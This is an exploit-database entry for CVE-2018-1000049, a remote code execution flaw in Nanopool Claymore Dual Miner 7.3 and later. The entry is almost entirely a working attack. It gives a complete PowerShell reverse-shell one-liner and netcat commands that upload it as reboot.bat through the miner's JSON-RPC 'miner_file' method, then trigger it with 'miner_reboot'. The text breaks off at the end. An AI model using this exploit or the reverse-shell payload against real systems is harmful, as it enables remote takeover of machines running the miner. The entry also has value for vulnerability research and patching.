Nanopool Claymore Dual Miner 7.3 - Remote Code Execution Vulnerability

ID 1337DAY-ID-30369
Type zdt
Reporter ReverseBrain
Modified 2018-05-17T00:00:00


Exploit for windows platform in category remote exploits

                                            # Exploit Title: Nanopool Claymore Dual Miner >= 7.3 Remote Code Execution
# Exploit Author: ReverseBrain
# Vendor Homepage:
# Software Link:
# Version: 7.3 and later
# Tested on: Windows, Linux
# CVE : 2018-1000049
Suppose the miner is running on localhost on port 3333. First of all you need to convert a .bat string into hexadecimal format, for example, this one uses powershell to spawn a reverse shell on localhost listening on port 1234:
powershell.exe -Command "$client = New-Object System.Net.Sockets.TCPClient('',1234);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
Convert it into hexadecimal and paste it on the second parameter inside this string:
echo '{"id":0,"jsonrpc":"2.0","method":"miner_file","params":["reboot.bat","HEX_STRING"]}' | nc 3333 -v
Then, to trigger the vulnerability just send {"id":0,"jsonrpc":"2.0","method":"miner_reboot"}
string to the miner.
echo '{"id":0,"jsonrpc":"2.0","method":"miner_reboot"}' | nc 3333 -v
You got the shell!
This exploit works also on Linux, just substitute reboot.bat with reboot.bash or

# [2018-05-18]  #